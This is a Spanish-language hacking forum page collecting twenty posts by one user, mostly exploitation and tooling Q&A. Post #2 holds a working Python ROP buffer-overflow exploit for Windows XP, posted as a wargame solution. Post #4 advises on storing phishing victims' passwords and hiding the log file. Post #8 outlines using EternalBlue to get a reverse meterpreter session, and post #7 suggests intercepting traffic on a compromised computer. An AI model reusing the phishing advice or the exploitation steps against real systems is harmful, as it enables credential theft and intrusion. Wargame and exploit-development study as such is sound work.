Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - .:UND3R:.

#1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
parchado , ojala saquen otros exploits o descubran otros nuevos

Y por que no creas tú tus propios exploits?

Saludos
#2
Wargames y retos / Re:Reto Genera Tu Exploit!
Marzo 22, 2018, 03:21:11 AM
Han pasado 6 años y tan solo dos participantes han entregado una solución, por lo cual he decidido publicar la mía por si alguien le puede mejorar y así aprendemos todos. El tamaño del payload es de 80 bytes existiendo un límite de 175 caracteres permitidos para poder realizar un BoF normal en vez de un BoF SEH (el cual en mi sistema no pude encontrar ROP Gadgets que permitieran saltar de SEH a nSEH con DEP activado).

Imágenes

Ejecución de la calculadora


Ejecución de CMD

PoC programado en Python
Código: python
# Operating system = Microsoft Windows XP Profesional Version 2002 Service Pack 3
# Language         = Spanish
# Author           = UND3R
# Size             = 80 bytes
# WinExec(calc, -1)

import struct
from struct import pack

junk = 'A' * 44
eip = pack("<I",0x7c91120f) # ntdll.dll | RETN
rop1 = pack("<I",0x7c912486) # ntdll.dll | POP EDI / RETN
rop2 = pack("<I",0x7c91120f) # ntdll.dll | RETN
rop3 = pack("<I",0x7c911d52) # ntdll.dll | POP ESI / RETN
rop4 = pack("<I",0x7c8623ad) # kernel32.dll | WinExec
rop5 = pack("<I",0x7c80dfdd) # kernel32.dll | POP EBX / RETN
rop6 = pack("<I",0xffffffff)
rop7 = pack("<I",0x7c95d22b) # ntdll.dll | PUSHAD / RETN
rop8 = 'calc'

payload = junk + eip + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8

f = open('config.txt', 'w')
f.write(payload)
f.close()


Espero que les haya gustado mi ROP Gadgets, saludos

.:UND3R:.
#3
Excelente artículo, qué versión de gblic haz usado para demostrar el unlink()? Pues la macro unlink actualmente verifica la lista de bins doblemente enlazada y en caso de no haber continuidad se alerta una corrupción en el heap, saludos
#4
Podrías comenzar estudiando Javascript, sabiendo hacer un hola mundo, posterior aprendiendo a programar PHP, no es necesario recibir los datos ingresados por la vícitma por email, pues requerirías configurar el servidor SMTP en el servidor en donde haz montado la página de phising, no es mejor almacenar la clave en un .log o .txt y denegar el acceso frente a curiosos o robots por medio de directivas dentro de un archivo .htaccess?

Saludos
#5
Creo que aquellas que permiten hacer Crwaler desde lenguajes de script para poder hacer varias tareas de forma cómoda y sencilla:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos
#6
Comienza especificando en donde deseas hacer el spread, cual es la intención, alcance, etc.

Probaste usando google? Pues yo quiero hacer hacking me ayudarías? Mi pregunta es exactamente igual de incoherente y des-informada que la tuya

Saludos
#7
Dudas y pedidos generales / Re:soquetes en python :)
Marzo 21, 2018, 04:03:52 PM
¿No sería mejor utilizar BurpSuite? y poner directivas al estilo:
- Si la URL de destino es X y su contenido dentro de la petición POST es Y hacer Z

Acepta REGEX, para hacer que todos pasen por el, podrías hacer un envenenamiento de red o configurar el proxy en el computador a comprometer de forma local o con algún script que lo haga de forma automatizada
#8
Eternal blue es un fallo del protocolo SMB v1.0 el cual para chequear si es vulnerable el puerto 445 debería estar abierto, esto permitiría inyectar el payload el cual ocasionaría controlar a tu merced el ordenador comprometido, por lo cual podrías subir una DLL al proceso comprometido con eternalblue (dentro del mismo framework con el cual usas eternalblue) eligiendo una dll creada con Empire Framework, tras inyectar la dll (puerto 445) esta se conectará al puerto que tu estimes conveniente (ese deberá estar abierto y es el puerto de TU ROUTER no del PC comprometido), recibiendo la sesión en Empire Framework ya puedes migrarte a meterpreter.

En resumen:
- El objetivo debe tener puerto 445 para explotar eternablue
- El objetivo no debe filtrar las conexiones salientes (algo muy común en las configuraciones de firewall pues bloquean conexiones entrantes en vez de las salientes, a excepción de que se hayan implementado políticas o que existan IPS o IDS, aunque estos ya mitigarían eternalblue)
- Abrir el puerto con el cual escucharás la conexión inversa.
- Disfrutar de forma responsable un meterpreter

#9
Todos deben ser .rb, deben contener la clase MetasploitModule y además estos son cargados durante el inicio de msfconsole, por lo cual si los haz copiado y pegado a mitad del prompt de Metasploit deberías cerrar y abrir nuevamente el framework.

Como dato adicional durante el proceso de carga, en caso de que el exploit presente errores o advertencias, en la consola de msfconsole se te es notificado.

Saludos
#10
Hola a todos, dejo a disposición lo que será una serie de video tutoriales sobre la introducción al Exploiting en Windows x86/32 bits. Estos videos tutoriales se basan en los tutoriales de Corelan

Lista de reproducción de Youtube


Lista de Youtube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

-- Descargas de programas utilizados, PDF y más.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Dudas o consultas
Pueden hacerlas en este post.

Saludos
#11
El primer exploit liberado no cubría varias plataformas, por lo que entiendo se rediseño para el framework metasploit
#12
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola estas herramientas se corren  con metasploit?

No, es un framework desarrollado por NSA (por lo menos eso dicen) que explota el fallo de seguridad MS-17-010 de Windows el cual se aprovecha de un fallo en el protocolo SMB v1.0, este fallo de seguridad dentro del Framework tiene como nombre EternalBlue.

Cabe mencionar que este framework corre en plataformas windows con Python. Lo he testeado y funciona correctamente, los otros plugins o exploits existentes en el frameworks no los he experimentado pero aun así podría asegurar que son funcionales.

Saludos

PD: Si mal no me equivoco existe un exploit para metasploit, pero se limita la cantidad de objetivos, el EternalBlue se encuentra más elaborado en relación al que circula por Internet.

PD2: Puedes usar scripts de nmap para verificar si el host es susceptible a este tipo de exploits, saludos
#13
Tal como comentan tienes que estar seguro que tras instalar el gestor de base de datos, tienes habilitada la opción de recibir conexiones remotas:




Fuente de las imágenes (Microsoft)

También debes saber que como directiva de seguridad el usuario sa, usuario por defecto, bloquea las conexiones entrantes tras cierta cantidad de intentos (mecanismo de protección anti-bruteforce)

Saludos
#14
Código: asm
movabs rsi,0x6000dc


Modifiquemos un poco este valor: 0x006000dc

Código: php
0x006000dc + 0x11111111 = 0x117111ED


Podrías hacer esto:
Código: asm
mov rsi, 0x117111ED
sub rsi, 0x11111111


Saludos

EDIT: Con respecto a eso de "usar" no te entendí muy bien pero en realidad tanto RBP como RSP su usan.

RSP siempre apunta a la cima del stack, mientras que RBP es utilizado como Frame Pointer (epílogo y prólogo):
#15
Lamentablemente Winrar utilizar el cifrado AES, el cual la única forma de crackear es utilizando fuerza bruta.
#16
Dudas y pedidos generales / Re:Responser.py
Enero 02, 2016, 09:20:48 PM
Si ya ejecutaste el script con sudo, pues sí o sí debes tener los puertos en uso, prueba con un nmap a localhost o service apache stop (asumiendo que tienes como servicio a Apache)

Saludos
#17
Código: php
def main():
    # my code here

if __name__ == "__main__":
    main()


#18
Debes poner la máquina virtual con tipo de conexión en puente, saludos.
#19
Dudas y pedidos generales / Re:Problemas con CrackMe
Diciembre 18, 2015, 02:34:31 AM
El crackme esát programa en C# por lo cual requieres un decompilador de tal lenguaje como reflector, saludos.
#20
Ingeniería Inversa / Re:Memory Hacking Software
Diciembre 17, 2015, 04:19:16 AM
Excelente aporte, cabe destacar que Cheat engine es código abierto, por lo cual si estamos preocupados por la detección de este, basta con comenzar a modificar su código de fuente, saludos.